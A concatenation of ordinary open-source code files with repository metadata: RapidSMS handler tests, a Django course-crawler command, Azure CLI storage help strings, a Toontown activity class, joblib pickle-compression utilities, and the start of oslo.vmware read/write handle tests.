self._check_get_handlers()
def test_installed_app(self):
"""App should use prefix matching to determine handlers to include."""
self.settings['INSTALLED_APPS'] = [self.ECHO_APP]
self.settings['INSTALLED_HANDLERS'] = [self.ECHO_APP]
self._check_get_handlers(EchoHandler, PingHandler)
def test_exclude_handlers__installed_apps(self):
"""App should exclude handlers listed in EXCLUDED_HANDLERS."""
self.settings['INSTALLED_APPS'] = [self.ECHO_APP]
self.settings['EXCLUDED_HANDLERS'] = [self.PING_HANDLER]
self._check_get_handlers(EchoHandler)
def test_exclude_handlers__no_installed_apps(self):
"""App should handle when an EXCLUDED_HANDLER can't be found."""
self.settings['EXCLUDED_HANDLERS'] = [self.PING_HANDLER]
self._check_get_handlers()
def test_exclude_app(self):
"""App should use prefix matching to determine handlers to exclude."""
self.settings['INSTALLED_APPS'] = [self.ECHO_APP]
self.settings['EXCLUDED_HANDLERS'] = [self.ECHO_APP]
self._check_get_handlers()
def test_empty_rapidsms_handlers(self):
# If RAPIDSMS_HANDLERS is empty, no handlers are loaded.
self.settings['INSTALLED_APPS'] = [self.ECHO_APP]
self.settings['INSTALLED_HANDLERS'] = [self.ECHO_APP]
self.settings['RAPIDSMS_HANDLERS'] = []
self._check_get_handlers()
def test_rapidsms_handlers(self):
# If RAPIDSMS_HANDLERS is set, it completely controls which handlers
# are loaded.
self.settings['INSTALLED_APPS'] = [self.DEFAULT_APP]
self.settings['INSTALLED_HANDLERS'] = []
self.settings['EXCLUDED_HANDLERS'] = [self.PING_HANDLER]
self.settings['RAPIDSMS_HANDLERS'] = [
self.ECHO_HANDLER_CLASS,
self.PING_HANDLER_CLASS
]
self._check_get_handlers(EchoHandler, PingHandler)
| {
"content_hash": "2ab0e233217fbef09f8c1cbba5f76437",
"timestamp": "",
"source": "github",
"line_count": 118,
"max_line_length": 79,
"avg_line_length": 42.16101694915254,
"alnum_prop": 0.652462311557789,
"repo_name": "eHealthAfrica/rapidsms",
"id": "d9c1d2666b2beebb1ed3c1d64e8c3b8a411362d9",
"size": "5027",
"binary": false,
"copies": "7",
"ref": "refs/heads/develop",
"path": "rapidsms/contrib/handlers/tests/utils.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "27100"
},
{
"name": "JavaScript",
"bytes": "16887"
},
{
"name": "Python",
"bytes": "350060"
},
{
"name": "Shell",
"bytes": "5100"
}
],
"symlink_target": ""
} |
from django.core.management.base import BaseCommand, CommandError
from stalku.core.management.commands._lectures import crawl_institutes, \
crawl_lectures_grad, crawl_lecture_grad
from stalku.core.models import Lecture, LectureInstance, Institute
class Command(BaseCommand):
help = 'Crawls DAC website'
def add_arguments(self, parser):
parser.add_argument('year', type=int,
help='Year to get lectures from.')
parser.add_argument('semester', type=int,
help='Semester to get lectures from.')
parser.add_argument('degree_level', nargs='?', default='grad',
type=str, choices=[code for code, _ in Lecture.DEGREE_LEVELS],
help='Specify the degree level to get information from.')
def handle(self, *args, **options):
institutes = crawl_institutes(**options)
self.stdout.write('Institutes for \'{}\' ({}):'.format(
options['degree_level'],
len(institutes))
)
for institute in institutes:
self.stdout.write('\t- {}'.format(institute['name']))
Institute.objects.update_or_create(**institute)
for institute in Institute.objects.all():
# Getting lectures
code, name = institute.code, institute.name
lectures = crawl_lectures_grad(code, **options)
self.stdout.write('Getting lectures for {}: {} found. '.format(name, len(lectures)))
existing_lecs = [x['code'] for x in Lecture.objects.values('code')]
for l in [lec for lec in lectures if lec.replace('_', ' ') not in existing_lecs]:
try:
lecture_args = crawl_lecture_grad(l, **options)
lecture_args['institute'] = institute
groups = lecture_args.pop('groups', [])
obj = Lecture.objects.create(**lecture_args)
for g in groups:
LectureInstance.objects.create(
lecture=obj, group=g,
year=options['year'],
semester=options['semester']
)
except Exception as e:
raise CommandError('Error trying to parse {}: {}'.format(l, e))
| {
"content_hash": "68632e58de4585e9e1a0239376395150",
"timestamp": "",
"source": "github",
"line_count": 54,
"max_line_length": 96,
"avg_line_length": 43.77777777777778,
"alnum_prop": 0.5516074450084603,
"repo_name": "henriquenogueira/stalku",
"id": "46cfc128388cc7bff839d3e37ecf3d36614721cd",
"size": "2364",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "stalku/core/management/commands/crawl_lectures.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "25714"
}
],
"symlink_target": ""
} |
from azure.cli.core.help_files import helps
# pylint: disable=line-too-long, too-many-lines
helps['storage entity insert'] = """
type: command
short-summary: Insert an entity into a table.
parameters:
- name: --table-name -t
type: string
short-summary: The name of the table to insert the entity into.
- name: --entity -e
type: list
short-summary: A space-separated list of key=value pairs. Must contain a PartitionKey and a RowKey.
long-summary: The PartitionKey and RowKey must be unique within the table, and may be up to 64Kb in size. If using an integer value as a key,
convert it to a fixed-width string which can be canonically sorted.
For example, convert the integer value 1 to the string value "0000001" to ensure proper sorting.
- name: --if-exists
type: string
short-summary: Behavior when an entity already exists for the specified PartitionKey and RowKey.
- name: --timeout
short-summary: The server timeout, expressed in seconds.
"""
helps['storage blob upload'] = """
type: command
short-summary: Upload a file to a storage blob.
long-summary: Creates a new blob from a file path, or updates the content of an existing blob with automatic chunking and progress notifications.
examples:
- name: Upload to a blob.
text: az storage blob upload -f /path/to/file -c MyContainer -n MyBlob
"""
helps['storage file upload'] = """
type: command
short-summary: Upload a file to a share that uses the SMB 3.0 protocol.
long-summary: Creates or updates an Azure file from a source path with automatic chunking and progress notifications.
examples:
- name: Upload to a local file to a share.
text: az storage file upload -s MyShare -source /path/to/file
"""
helps['storage blob show'] = """
type: command
short-summary: Get the details of a blob.
examples:
- name: Show all properties of a blob.
text: az storage blob show -c MyContainer -n MyBlob
"""
helps['storage blob delete'] = """
type: command
short-summary: Mark a blob or snapshot for deletion.
long-summary: >
The blob is marked for later deletion during garbage collection. In order to delete a blob, all of its snapshots must also be deleted.
Both can be removed at the same time.
examples:
- name: Delete a blob.
text: az storage blob delete -c MyContainer -n MyBlob
"""
helps['storage account create'] = """
type: command
short-summary: Create a storage account.
examples:
- name: Create a storage account 'MyStorageAccount' in resource group 'MyResourceGroup' in the West US region with locally redundant storage.
text: az storage account create -n MyStorageAccount -g MyResourceGroup -l westus --sku Standard_LRS
min_profile: latest
- name: Create a storage account 'MyStorageAccount' in resource group 'MyResourceGroup' in the West US region with locally redundant storage.
text: az storage account create -n MyStorageAccount -g MyResourceGroup -l westus --account-type Standard_LRS
max_profile: 2017-03-09-profile
"""
helps['storage container create'] = """
type: command
short-summary: Create a container in a storage account.
examples:
- name: Create a storage container in a storage account.
text: az storage container create -n MyStorageContainer
- name: Create a storage container in a storage account and return an error if the container already exists.
text: az storage container create -n MyStorageContainer --fail-on-exist
"""
helps['storage account list'] = """
type: command
short-summary: List storage accounts.
examples:
- name: List all storage accounts in a subscription.
text: az storage account list
- name: List all storage accounts in a resource group.
text: az storage account list -g MyResourceGroup
"""
helps['storage account show'] = """
type: command
short-summary: Show storage account properties.
examples:
- name: Show properties for a storage account by resource ID.
text: az storage account show --ids /subscriptions/{SubID}/resourceGroups/{MyResourceGroup}/providers/Microsoft.Storage/storageAccounts/{MyStorageAccount}
- name: Show properties for a storage account using an account name and resource group.
text: az storage account show -g MyResourceGroup -n MyStorageAccount
"""
helps['storage blob list'] = """
type: command
short-summary: List storage blobs in a container.
examples:
- name: List all storage blobs in a container.
text: az storage blob list -c MyContainer
"""
helps['storage account delete'] = """
type: command
short-summary: Delete a storage account.
examples:
- name: Delete a storage account using a resource ID.
text: az storage account delete --ids /subscriptions/{SubID}/resourceGroups/{MyResourceGroup}/providers/Microsoft.Storage/storageAccounts/{MyStorageAccount}
- name: Delete a storage account using an account name and resource group.
text: az storage account delete -n MyStorageAccount -g MyResourceGroup
"""
helps['storage account show-connection-string'] = """
type: command
short-summary: Get the connection string for a storage account.
examples:
- name: Get a connection string for a storage account.
text: az storage account show-connection-string -g MyResourceGroup -n MyStorageAccount
"""
helps['storage'] = """
type: group
short-summary: Manage Azure Cloud Storage resources.
"""
helps['storage account'] = """
type: group
short-summary: Manage storage accounts.
"""
helps['storage account update'] = """
type: command
short-summary: Update the properties of a storage account.
"""
helps['storage account keys'] = """
type: group
short-summary: Manage storage account keys.
"""
helps['storage account keys list'] = """
type: command
short-summary: List the primary and secondary keys for a storage account.
examples:
- name: List the primary and secondary keys for a storage account.
text: az storage account keys list -g MyResourceGroup -n MyStorageAccount
"""
helps['storage blob'] = """
type: group
short-summary: Manage object storage for unstructured data (blobs).
"""
helps['storage blob exists'] = """
type: command
short-summary: Check for the existence of a blob in a container.
"""
helps['storage blob list'] = """
type: command
short-summary: List blobs in a given container.
"""
helps['storage blob copy'] = """
type: group
short-summary: Manage blob copy operations.
"""
helps['storage blob incremental-copy'] = """
type: group
short-summary: Manage blob incremental copy operations.
"""
helps['storage blob lease'] = """
type: group
short-summary: Manage storage blob leases.
"""
helps['storage blob metadata'] = """
type: group
short-summary: Manage blob metadata.
"""
helps['storage blob service-properties'] = """
type: group
short-summary: Manage storage blob service properties.
"""
helps['storage blob set-tier'] = """
type: command
short-summary: Set the block or page tiers on the blob.
long-summary: >
        For block blobs, this command only supports block blobs on standard storage accounts.
        For page blobs, this command only supports page blobs on premium accounts.
"""
helps['storage blob copy start-batch'] = """
type: command
short-summary: Copy multiple blobs or files to a blob container.
parameters:
- name: --destination-container
type: string
short-summary: The blob container where the selected source files or blobs will be copied to.
- name: --pattern
type: string
          short-summary: The pattern used for globbing files or blobs in the source. The supported patterns are '*', '?', '[seq]', and '[!seq]'.
- name: --dryrun
type: bool
short-summary: List the files or blobs to be uploaded. No actual data transfer will occur.
- name: --source-account-name
type: string
short-summary: The source storage account from which the files or blobs are copied to the destination. If omitted, the source account is used.
- name: --source-account-key
type: string
short-summary: The account key for the source storage account.
- name: --source-container
type: string
short-summary: The source container from which blobs are copied.
- name: --source-share
type: string
short-summary: The source share from which files are copied.
- name: --source-uri
type: string
short-summary: A URI specifying a file share or blob container from which the files or blobs are copied.
long-summary: If the source is in another account, the source must either be public or be authenticated by using a shared access signature.
- name: --source-sas
type: string
short-summary: The shared access signature for the source storage account.
"""
helps['storage container'] = """
type: group
short-summary: Manage blob storage containers.
"""
helps['storage container exists'] = """
type: command
short-summary: Check for the existence of a storage container.
"""
helps['storage container list'] = """
type: command
short-summary: List containers in a storage account.
"""
helps['storage container lease'] = """
type: group
short-summary: Manage blob storage container leases.
"""
helps['storage container metadata'] = """
type: group
short-summary: Manage container metadata.
"""
helps['storage container policy'] = """
type: group
short-summary: Manage container stored access policies.
"""
helps['storage cors'] = """
type: group
short-summary: Manage storage service Cross-Origin Resource Sharing (CORS).
"""
helps['storage cors add'] = """
type: command
short-summary: Add a CORS rule to a storage account.
parameters:
- name: --services
short-summary: >
The storage service(s) to add rules to. Allowed options are: (b)lob, (f)ile,
(q)ueue, (t)able. Can be combined.
- name: --max-age
short-summary: The maximum number of seconds the client/browser should cache a preflight response.
- name: --origins
short-summary: List of origin domains that will be allowed via CORS, or "*" to allow all domains.
- name: --methods
short-summary: List of HTTP methods allowed to be executed by the origin.
- name: --allowed-headers
short-summary: List of response headers allowed to be part of the cross-origin request.
- name: --exposed-headers
short-summary: List of response headers to expose to CORS clients.
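    examples:
        - name: Add a CORS rule (illustrative values) allowing GET requests from any origin against the blob service.
          text: az storage cors add --account-name MyStorageAccount --services b --methods GET --origins '*' --allowed-headers '*' --max-age 200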
"""
helps['storage cors clear'] = """
type: command
short-summary: Remove all CORS rules from a storage account.
parameters:
- name: --services
short-summary: >
The storage service(s) to remove rules from. Allowed options are: (b)lob, (f)ile,
(q)ueue, (t)able. Can be combined.
"""
helps['storage cors list'] = """
type: command
short-summary: List all CORS rules for a storage account.
parameters:
- name: --services
short-summary: >
The storage service(s) to list rules for. Allowed options are: (b)lob, (f)ile,
(q)ueue, (t)able. Can be combined.
"""
helps['storage directory'] = """
type: group
short-summary: Manage file storage directories.
"""
helps['storage directory exists'] = """
type: command
short-summary: Check for the existence of a storage directory.
"""
helps['storage directory metadata'] = """
type: group
short-summary: Manage file storage directory metadata.
"""
helps['storage directory list'] = """
type: command
short-summary: List directories in a share.
"""
helps['storage entity'] = """
type: group
short-summary: Manage table storage entities.
"""
helps['storage entity query'] = """
type: command
short-summary: List entities which satisfy a query.
"""
helps['storage file'] = """
type: group
short-summary: Manage file shares that use the SMB 3.0 protocol.
"""
helps['storage file exists'] = """
type: command
short-summary: Check for the existence of a file.
"""
helps['storage file list'] = """
type: command
short-summary: List files and directories in a share.
parameters:
- name: --exclude-dir
type: bool
short-summary: List only files in the given share.
"""
helps['storage file copy'] = """
type: group
short-summary: Manage file copy operations.
"""
helps['storage file metadata'] = """
type: group
short-summary: Manage file metadata.
"""
helps['storage file upload-batch'] = """
type: command
short-summary: Upload files from a local directory to an Azure Storage File Share in a batch operation.
parameters:
- name: --source -s
type: string
short-summary: The directory to upload files from.
- name: --destination -d
type: string
short-summary: The destination of the upload operation.
long-summary: The destination can be the file share URL or the share name. When the destination is the share URL, the storage account name is parsed from the URL.
- name: --pattern
type: string
            short-summary: The pattern used for file globbing. The supported patterns are '*', '?', '[seq]', and '[!seq]'.
- name: --dryrun
type: bool
short-summary: List the files and blobs to be uploaded. No actual data transfer will occur.
- name: --max-connections
type: integer
short-summary: The maximum number of parallel connections to use. Default value is 1.
- name: --validate-content
type: bool
short-summary: If set, calculates an MD5 hash for each range of the file for validation.
long-summary: >
The storage service checks the hash of the content that has arrived is identical to the hash that was sent.
This is mostly valuable for detecting bitflips during transfer if using HTTP instead of HTTPS. This hash is not stored.
"""
helps['storage file download-batch'] = """
type: command
short-summary: Download files from an Azure Storage File Share to a local directory in a batch operation.
parameters:
- name: --source -s
type: string
short-summary: The source of the file download operation. The source can be the file share URL or the share name.
- name: --destination -d
type: string
short-summary: The local directory where the files are downloaded to. This directory must already exist.
- name: --pattern
type: string
            short-summary: The pattern used for file globbing. The supported patterns are '*', '?', '[seq]', and '[!seq]'.
- name: --dryrun
type: bool
short-summary: List the files and blobs to be downloaded. No actual data transfer will occur.
- name: --max-connections
type: integer
short-summary: The maximum number of parallel connections to use. Default value is 1.
- name: --validate-content
type: bool
short-summary: If set, calculates an MD5 hash for each range of the file for validation.
long-summary: >
The storage service checks the hash of the content that has arrived is identical to the hash that was sent.
This is mostly valuable for detecting bitflips during transfer if using HTTP instead of HTTPS. This hash is not stored.
"""
helps['storage file copy start-batch'] = """
type: command
short-summary: Copy multiple files or blobs to a file share.
parameters:
- name: --destination-share
type: string
short-summary: The file share where the source data is copied to.
- name: --destination-path
type: string
short-summary: The directory where the source data is copied to. If omitted, data is copied to the root directory.
- name: --pattern
type: string
            short-summary: The pattern used for globbing files and blobs. The supported patterns are '*', '?', '[seq]', and '[!seq]'.
- name: --dryrun
type: bool
short-summary: List the files and blobs to be copied. No actual data transfer will occur.
- name: --source-account-name
type: string
short-summary: The source storage account to copy the data from. If omitted, the destination account is used.
- name: --source-account-key
type: string
short-summary: The account key for the source storage account. If omitted, the active login is used to determine the account key.
- name: --source-container
type: string
short-summary: The source container blobs are copied from.
- name: --source-share
type: string
short-summary: The source share files are copied from.
- name: --source-uri
type: string
            short-summary: A URI that specifies the source file share or blob container.
long-summary: If the source is in another account, the source must either be public or authenticated via a shared access signature.
- name: --source-sas
type: string
short-summary: The shared access signature for the source storage account.
"""
helps['storage logging'] = """
type: group
short-summary: Manage storage service logging information.
"""
helps['storage logging show'] = """
type: command
short-summary: Show logging settings for a storage account.
"""
helps['storage logging update'] = """
type: command
short-summary: Update logging settings for a storage account.
"""
helps['storage message'] = """
type: group
short-summary: Manage queue storage messages.
"""
helps['storage metrics'] = """
type: group
short-summary: Manage storage service metrics.
"""
helps['storage metrics show'] = """
type: command
short-summary: Show metrics settings for a storage account.
"""
helps['storage metrics update'] = """
type: command
short-summary: Update metrics settings for a storage account.
"""
helps['storage queue'] = """
type: group
short-summary: Manage storage queues.
"""
helps['storage queue list'] = """
type: command
short-summary: List queues in a storage account.
"""
helps['storage queue metadata'] = """
type: group
short-summary: Manage the metadata for a storage queue.
"""
helps['storage queue policy'] = """
type: group
short-summary: Manage shared access policies for a storage queue.
"""
helps['storage share'] = """
type: group
short-summary: Manage file shares.
"""
helps['storage share exists'] = """
type: command
short-summary: Check for the existence of a file share.
"""
helps['storage share list'] = """
type: command
short-summary: List the file shares in a storage account.
"""
helps['storage share metadata'] = """
type: group
short-summary: Manage the metadata of a file share.
"""
helps['storage share policy'] = """
type: group
short-summary: Manage shared access policies of a storage file share.
"""
helps['storage table'] = """
type: group
short-summary: Manage NoSQL key-value storage.
"""
helps['storage table list'] = """
type: command
short-summary: List tables in a storage account.
"""
helps['storage table policy'] = """
type: group
short-summary: Manage shared access policies of a storage table.
"""
helps['storage account network-rule'] = """
type: group
short-summary: Manage network rules.
"""
helps['storage account network-rule add'] = """
type: command
short-summary: Add a network rule.
long-summary: >
Rules can be created for an IPv4 address, address range (CIDR format), or a virtual network subnet.
examples:
- name: Create a rule to allow a specific address-range.
text: az storage account network-rule add -g myRg --account-name mystorageaccount --ip-address 23.45.1.0/24
- name: Create a rule to allow access for a subnet.
text: az storage account network-rule add -g myRg --account-name mystorageaccount --vnet myvnet --subnet mysubnet
"""
helps['storage account network-rule list'] = """
type: command
short-summary: List network rules.
"""
helps['storage account network-rule remove'] = """
type: command
short-summary: Remove a network rule.
"""
| {
"content_hash": "189e18ed49587989933b5245d65e182f",
"timestamp": "",
"source": "github",
"line_count": 584,
"max_line_length": 172,
"avg_line_length": 36.08390410958904,
"alnum_prop": 0.6585678356190385,
"repo_name": "QingChenmsft/azure-cli",
"id": "7b560c4d4ad18c0a5cc51a8a504eb8797084b008",
"size": "21419",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "src/command_modules/azure-cli-storage/azure/cli/command_modules/storage/_help.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "11279"
},
{
"name": "C++",
"bytes": "275"
},
{
"name": "JavaScript",
"bytes": "380"
},
{
"name": "Python",
"bytes": "5372365"
},
{
"name": "Shell",
"bytes": "25445"
}
],
"symlink_target": ""
} |
from direct.directnotify import DirectNotifyGlobal
from toontown.parties.DistributedPartyJukeboxActivityBaseAI import DistributedPartyJukeboxActivityBaseAI
class DistributedPartyJukebox40ActivityAI(DistributedPartyJukeboxActivityBaseAI):
notify = DirectNotifyGlobal.directNotify.newCategory("DistributedPartyJukebox40ActivityAI")
| {
"content_hash": "e2b801d2deeafa9da9888df5158c6f06",
"timestamp": "",
"source": "github",
"line_count": 6,
"max_line_length": 104,
"avg_line_length": 56,
"alnum_prop": 0.9047619047619048,
"repo_name": "Spiderlover/Toontown",
"id": "d392b804b548c6ae9d6e24d1e111df3a2dd4cb57",
"size": "336",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "toontown/parties/DistributedPartyJukebox40ActivityAI.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "7774"
},
{
"name": "Python",
"bytes": "17241353"
},
{
"name": "Shell",
"bytes": "7699"
}
],
"symlink_target": ""
} |
"""Utilities for fast persistence of big data, with optional compression."""
# Author: Gael Varoquaux <gael dot varoquaux at normalesup dot org>
# Copyright (c) 2009 Gael Varoquaux
# License: BSD Style, 3 clauses.
import pickle
import io
import warnings
import contextlib
from contextlib import closing
from ._compat import PY3_OR_LATER, PY27
from .compressor import _ZFILE_PREFIX
from .compressor import _COMPRESSORS
if PY3_OR_LATER:
Unpickler = pickle._Unpickler
Pickler = pickle._Pickler
xrange = range
else:
Unpickler = pickle.Unpickler
Pickler = pickle.Pickler
try:
import numpy as np
except ImportError:
np = None
try:
# The python standard library can be built without bz2 so we make bz2
# usage optional.
# see https://github.com/scikit-learn/scikit-learn/issues/7526 for more
# details.
import bz2
except ImportError:
bz2 = None
# Buffer size used in io.BufferedReader and io.BufferedWriter
_IO_BUFFER_SIZE = 1024 ** 2
def _is_raw_file(fileobj):
"""Check if fileobj is a raw file object, e.g created with open."""
if PY3_OR_LATER:
fileobj = getattr(fileobj, 'raw', fileobj)
return isinstance(fileobj, io.FileIO)
else:
return isinstance(fileobj, file) # noqa
def _get_prefixes_max_len():
# Compute the max prefix len of registered compressors.
prefixes = [len(compressor.prefix) for compressor in _COMPRESSORS.values()]
prefixes += [len(_ZFILE_PREFIX)]
return max(prefixes)
###############################################################################
# Cache file utilities
def _detect_compressor(fileobj):
"""Return the compressor matching fileobj.
Parameters
----------
fileobj: file object
Returns
-------
str in {'zlib', 'gzip', 'bz2', 'lzma', 'xz', 'compat', 'not-compressed'}
"""
# Read the magic number in the first bytes of the file.
max_prefix_len = _get_prefixes_max_len()
if hasattr(fileobj, 'peek'):
        # Peek allows reading those bytes without moving the cursor in the
        # file.
first_bytes = fileobj.peek(max_prefix_len)
else:
# Fallback to seek if the fileobject is not peekable.
first_bytes = fileobj.read(max_prefix_len)
fileobj.seek(0)
if first_bytes.startswith(_ZFILE_PREFIX):
return "compat"
else:
for name, compressor in _COMPRESSORS.items():
if first_bytes.startswith(compressor.prefix):
return name
return "not-compressed"
def _buffered_read_file(fobj):
"""Return a buffered version of a read file object."""
if PY27 and bz2 is not None and isinstance(fobj, bz2.BZ2File):
# Python 2.7 doesn't work with BZ2File through a buffer: "no
# attribute 'readable'" error.
return fobj
else:
return io.BufferedReader(fobj, buffer_size=_IO_BUFFER_SIZE)
def _buffered_write_file(fobj):
"""Return a buffered version of a write file object."""
if PY27 and bz2 is not None and isinstance(fobj, bz2.BZ2File):
# Python 2.7 doesn't work with BZ2File through a buffer: no attribute
# 'writable'.
# BZ2File doesn't implement the file object context manager in python 2
# so we wrap the fileobj using `closing`.
return closing(fobj)
else:
return io.BufferedWriter(fobj, buffer_size=_IO_BUFFER_SIZE)
@contextlib.contextmanager
def _read_fileobject(fileobj, filename, mmap_mode=None):
"""Utility function opening the right fileobject from a filename.
The magic number is used to choose between the type of file object to open:
* regular file object (default)
* zlib file object
* gzip file object
* bz2 file object
* lzma file object (for xz and lzma compressor)
Parameters
----------
fileobj: file object
compressor: str in {'zlib', 'gzip', 'bz2', 'lzma', 'xz', 'compat',
'not-compressed'}
filename: str
filename path corresponding to the fileobj parameter.
mmap_mode: str
        memory map mode that should be used to open the pickle file. This
        parameter is useful to verify that the user is not trying to use
        memory mapping on a compressed file. Default: None.
Returns
-------
a file like object
"""
# Detect if the fileobj contains compressed data.
compressor = _detect_compressor(fileobj)
if compressor == 'compat':
# Compatibility with old pickle mode: simply return the input
# filename "as-is" and let the compatibility function be called by the
# caller.
warnings.warn("The file '%s' has been generated with a joblib "
"version less than 0.10. "
"Please regenerate this pickle file." % filename,
DeprecationWarning, stacklevel=2)
yield filename
else:
if compressor in _COMPRESSORS:
# based on the compressor detected in the file, we open the
# correct decompressor file object, wrapped in a buffer.
compressor_wrapper = _COMPRESSORS[compressor]
inst = compressor_wrapper.decompressor_file(fileobj)
fileobj = _buffered_read_file(inst)
# Checking if incompatible load parameters with the type of file:
# mmap_mode cannot be used with compressed file or in memory buffers
# such as io.BytesIO.
if mmap_mode is not None:
if isinstance(fileobj, io.BytesIO):
warnings.warn('In memory persistence is not compatible with '
'mmap_mode "%(mmap_mode)s" flag passed. '
'mmap_mode option will be ignored.'
% locals(), stacklevel=2)
elif compressor != 'not-compressed':
warnings.warn('mmap_mode "%(mmap_mode)s" is not compatible '
'with compressed file %(filename)s. '
'"%(mmap_mode)s" flag will be ignored.'
% locals(), stacklevel=2)
elif not _is_raw_file(fileobj):
warnings.warn('"%(fileobj)r" is not a raw file, mmap_mode '
'"%(mmap_mode)s" flag will be ignored.'
% locals(), stacklevel=2)
yield fileobj
def _write_fileobject(filename, compress=("zlib", 3)):
"""Return the right compressor file object in write mode."""
compressmethod = compress[0]
compresslevel = compress[1]
if compressmethod in _COMPRESSORS.keys():
file_instance = _COMPRESSORS[compressmethod].compressor_file(
filename, compresslevel=compresslevel)
return _buffered_write_file(file_instance)
else:
file_instance = _COMPRESSORS['zlib'].compressor_file(
filename, compresslevel=compresslevel)
return _buffered_write_file(file_instance)
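# Editor-added round-trip sketch: writing a zlib-compressed pickle through
# _write_fileobject and reading it back through _read_fileobject. The path
# '/tmp/obj.pkl' is a placeholder.
#
#     with _write_fileobject('/tmp/obj.pkl', compress=('zlib', 3)) as f:
#         pickle.dump({'answer': 42}, f)
#     with open('/tmp/obj.pkl', 'rb') as raw:
#         with _read_fileobject(raw, '/tmp/obj.pkl') as f:
#             pickle.load(f)     # -> {'answer': 42}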
# Utility functions/variables from numpy required for writing arrays.
# We need at least the functions introduced in version 1.9 of numpy. Here,
# we use the ones from numpy 1.10.2.
BUFFER_SIZE = 2 ** 18 # size of buffer for reading npz files in bytes
def _read_bytes(fp, size, error_template="ran out of data"):
"""Read from file-like object until size bytes are read.
    Raises ValueError if EOF is encountered before size bytes are read.
Non-blocking objects only supported if they derive from io objects.
Required as e.g. ZipExtFile in python 2.6 can return less data than
requested.
This function was taken from numpy/lib/format.py in version 1.10.2.
Parameters
----------
fp: file-like object
size: int
error_template: str
Returns
-------
a bytes object
The data read in bytes.
"""
data = bytes()
while True:
# io files (default in python3) return None or raise on
# would-block, python2 file will truncate, probably nothing can be
# done about that. note that regular files can't be non-blocking
try:
r = fp.read(size - len(data))
data += r
if len(r) == 0 or len(data) == size:
break
except io.BlockingIOError:
pass
if len(data) != size:
msg = "EOF: reading %s, expected %d bytes got %d"
raise ValueError(msg % (error_template, size, len(data)))
else:
return data
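# Editor-added example: _read_bytes returns exactly `size` bytes or raises.
#
#     _read_bytes(io.BytesIO(b'abcdef'), 4)   # -> b'abcd'
#     _read_bytes(io.BytesIO(b'ab'), 4)       # ValueError: EOF: reading ran out
#                                             # of data, expected 4 bytes got 2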
| {
"content_hash": "92013c3c3e5dff5a9f1eb7820e09602c",
"timestamp": "",
"source": "github",
"line_count": 245,
"max_line_length": 79,
"avg_line_length": 34.43265306122449,
"alnum_prop": 0.621977240398293,
"repo_name": "vortex-ape/scikit-learn",
"id": "1ebf1aa61bb44e345a09c6ce01b8242a0aefda51",
"size": "8436",
"binary": false,
"copies": "15",
"ref": "refs/heads/master",
"path": "sklearn/externals/joblib/numpy_pickle_utils.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "3366"
},
{
"name": "C",
"bytes": "394787"
},
{
"name": "C++",
"bytes": "140225"
},
{
"name": "Makefile",
"bytes": "1588"
},
{
"name": "PowerShell",
"bytes": "17312"
},
{
"name": "Python",
"bytes": "6351428"
},
{
"name": "Shell",
"bytes": "8687"
}
],
"symlink_target": ""
} |
# Copyright (c) 2014 VMware, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Unit tests for read and write handles for image transfer.
"""
import mock
from oslo.vmware import exceptions
from oslo.vmware import rw_handles
from oslo.vmware import vim_util
from tests import base
class FileHandleTest(base.TestCase):
"""Tests for FileHandle."""
def test_close(self):
file_handle = mock.Mock()
vmw_http_file = rw_handles.FileHandle(file_handle)
vmw_http_file.close()
file_handle.close.assert_called_once_with()
def test_del(self):
file_handle = mock.Mock()
vmw_http_file = rw_handles.FileHandle(file_handle)
del(vmw_http_file)
file_handle.close.assert_called_once_with()
def test_find_vmdk_url(self):
device_url_0 = mock.Mock()
device_url_0.disk = False
device_url_1 = mock.Mock()
device_url_1.disk = True
device_url_1.url = 'https://*/ds1/vm1.vmdk'
lease_info = mock.Mock()
lease_info.deviceUrl = [device_url_0, device_url_1]
host = '10.1.2.3'
exp_url = 'https://%s/ds1/vm1.vmdk' % host
vmw_http_file = rw_handles.FileHandle(None)
self.assertEqual(exp_url, vmw_http_file._find_vmdk_url(lease_info,
host))
class FileWriteHandleTest(base.TestCase):
"""Tests for FileWriteHandle."""
def setUp(self):
super(FileWriteHandleTest, self).setUp()
vim_cookie = mock.Mock()
vim_cookie.name = 'name'
vim_cookie.value = 'value'
self._conn = mock.Mock()
patcher = mock.patch('httplib.HTTPConnection')
self.addCleanup(patcher.stop)
HTTPConnectionMock = patcher.start()
HTTPConnectionMock.return_value = self._conn
self.vmw_http_write_file = rw_handles.FileWriteHandle(
'10.1.2.3', 'dc-0', 'ds-0', [vim_cookie], '1.vmdk', 100, 'http')
def test_write(self):
self.vmw_http_write_file.write(None)
self._conn.send.assert_called_once_with(None)
def test_close(self):
self.vmw_http_write_file.close()
self._conn.getresponse.assert_called_once_with()
self._conn.close.assert_called_once_with()
class VmdkWriteHandleTest(base.TestCase):
"""Tests for VmdkWriteHandle."""
def setUp(self):
super(VmdkWriteHandleTest, self).setUp()
self._conn = mock.Mock()
patcher = mock.patch('httplib.HTTPConnection')
self.addCleanup(patcher.stop)
HTTPConnectionMock = patcher.start()
HTTPConnectionMock.return_value = self._conn
def _create_mock_session(self, disk=True, progress=-1):
device_url = mock.Mock()
device_url.disk = disk
device_url.url = 'http://*/ds/disk1.vmdk'
lease_info = mock.Mock()
lease_info.deviceUrl = [device_url]
session = mock.Mock()
def session_invoke_api_side_effect(module, method, *args, **kwargs):
if module == session.vim:
if method == 'ImportVApp':
return mock.Mock()
elif method == 'HttpNfcLeaseProgress':
self.assertEqual(progress, kwargs['percent'])
return
return lease_info
session.invoke_api.side_effect = session_invoke_api_side_effect
vim_cookie = mock.Mock()
vim_cookie.name = 'name'
vim_cookie.value = 'value'
